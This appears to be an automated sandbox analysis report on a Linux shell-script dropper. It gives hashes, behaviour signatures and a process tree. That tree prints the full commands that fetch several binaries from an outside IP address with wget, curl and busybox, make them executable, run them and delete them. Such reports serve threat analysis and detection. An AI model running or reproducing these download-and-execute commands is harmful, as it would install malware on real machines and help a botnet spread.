Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh
-
Size
10KB
-
MD5
8eccec101f87a3ed0841253c005aa97f
-
SHA1
1619e034a10047b30bb121c4da04a6876dd1f076
-
SHA256
aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719
-
SHA512
af180fba356f1d42cde849697eb3326d656c3e3cb1fee810d3bd038d24cf802ad4d93e67121dbb1cf54a49e67ea395a2cded2d2b457c496f069f7532054c9a33
-
SSDEEP
96:Mk0WT740kP3wjK6sX4AcqQuUHCH2HI9H1Dzf740kP3G9mt0jUjK6swUDAAcT5HCq:Mk0WTDjK6sX4AcqQurcIUK6sJMAch
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 780 chmod 800 chmod 806 chmod 689 chmod 703 chmod 725 chmod 750 chmod 758 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B 690 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef 704 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e 726 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk 751 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo 759 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 782 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ 801 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU 807 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ curl File opened for modification /tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU curl File opened for modification /tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B curl File opened for modification /tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef curl File opened for modification /tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e curl File opened for modification /tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk curl File opened for modification /tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo curl File opened for modification /tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6 curl
Processes
-
/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh/tmp/aab8724f91c479bdd2a93c20e6e7d055b2c17547b8fcfe5de3bf2263eba89719.sh1⤵PID:655
-
/bin/rm/bin/rm bins.sh2⤵PID:657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:659
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:687
-
-
/bin/chmodchmod 777 rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B./rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵
- Executes dropped EXE
PID:690
-
-
/bin/rmrm rHUTEg2jXLiY6I08whbugWHCBkLJXiBr9B2⤵PID:691
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:692
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:697
-
-
/bin/chmodchmod 777 d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef./d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵
- Executes dropped EXE
PID:704
-
-
/bin/rmrm d1R2tZjac6omxkfQo9DWrwo0C1iI1soBef2⤵PID:705
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:706
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:714
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:720
-
-
/bin/chmodchmod 777 Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e./Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm Ca1tYwT46uqUVOyPeS6TqAjun0aJadZl1e2⤵PID:728
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:729
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:744
-
-
/bin/chmodchmod 777 j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk./j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm j6lTHvlMjxrh5xlV6KSkWFMglNiHy29iuk2⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:757
-
-
/bin/chmodchmod 777 bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo./bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm bYpdcUFSB4aMHdsZalKNV4EtqlVyPQGXZo2⤵PID:760
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:763
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:775
-
-
/bin/chmodchmod 777 Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG6./Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm Er2RvXuTUt7dZZd72n9fPe7YCKcyvBOWG62⤵PID:783
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:784
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:797
-
-
/bin/chmodchmod 777 D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ./D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm D8JyIg64Y6Fn6N9I2xRRBRRz5gg1zld3IZ2⤵PID:802
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:803
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:805
-
-
/bin/chmodchmod 777 sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU./sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm sZ5UcdMaxA1tH37XyCpQQnO7La6C0tTBsU2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CJOTYBy2p2114IdSRp1PsHiSXJ7JSPXB4Z2⤵PID:809
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97